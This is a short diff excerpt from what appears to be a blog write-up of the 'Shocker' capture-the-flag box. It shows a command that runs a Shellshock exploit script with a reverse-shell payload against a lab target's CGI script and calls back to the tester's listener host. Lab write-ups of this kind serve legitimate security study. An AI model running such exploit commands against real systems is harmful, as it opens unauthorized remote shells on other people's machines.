davidmckennirey/davidmckennirey.github.io/_posts/2021-05-03-shocker-write-up.md

 ...
 ```

 Okay, seems straightforward enough.
-Only one thing to do and thats give her a go.
+It will handle creating the listener, so all thats left to do is run it.

 ```bash
 $ ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.10 lport=8000 pages=/cgi-bin/user.sh